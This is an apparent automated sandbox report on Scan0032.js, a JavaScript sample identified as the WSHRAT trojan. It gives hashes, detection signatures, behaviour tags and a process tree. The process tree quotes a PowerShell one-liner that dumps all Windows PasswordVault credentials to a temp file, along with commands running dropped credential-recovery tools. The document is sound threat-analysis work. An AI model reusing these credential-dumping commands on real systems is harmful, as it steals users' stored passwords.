Analysis

  • max time kernel: 149s
  • max time network: 152s
  • platform: windows10_x64
  • resource: win10v20210408
  • submitted: 01/10/2021, 10:33

General

  • Target: Scan0032.js
  • Size: 1.1MB
  • MD5: 126c1417ab24cd6b4bf8889a5254ae18
  • SHA1: b9465bbe07f047f063f8e2a2e3dba87181fceac6
  • SHA256: bd1b9e3102b57857d294df0339682f25e2ccb17d0665c77dfefe6565a68f85ff
  • SHA512: bca88a55671be0e903f9ddaa9002dc37ba0c97f7c15431f09069c3740c41e5702fafa900bdaf0a0d436fc6bd50c669e4a22a70ac28b909ddc98726da24959a55

Malware Config

Signatures

  • WSHRAT

    WSHRAT is a variant of the Houdini worm and exists in both VBS and JS variants.

  • suricata: ET MALWARE WSHRAT CnC Checkin
  • suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
  • suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 23 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and browsing history.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 21 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0032.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:768
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3748
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      PID:3832
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
      PID:2756
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
      1⤵
      PID:2244

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2700-134-0x0000028553026000-0x0000028553028000-memory.dmp (Filesize: 8KB)
  • memory/2700-125-0x000002853AE50000-0x000002853AE51000-memory.dmp (Filesize: 4KB)
  • memory/2700-132-0x0000028552FD0000-0x0000028552FD1000-memory.dmp (Filesize: 4KB)
  • memory/2700-124-0x0000028553023000-0x0000028553025000-memory.dmp (Filesize: 8KB)
  • memory/2700-123-0x0000028553020000-0x0000028553022000-memory.dmp (Filesize: 8KB)
  • memory/2700-122-0x00000285531B0000-0x00000285531B1000-memory.dmp (Filesize: 4KB)
  • memory/2700-119-0x000002853AE10000-0x000002853AE11000-memory.dmp (Filesize: 4KB)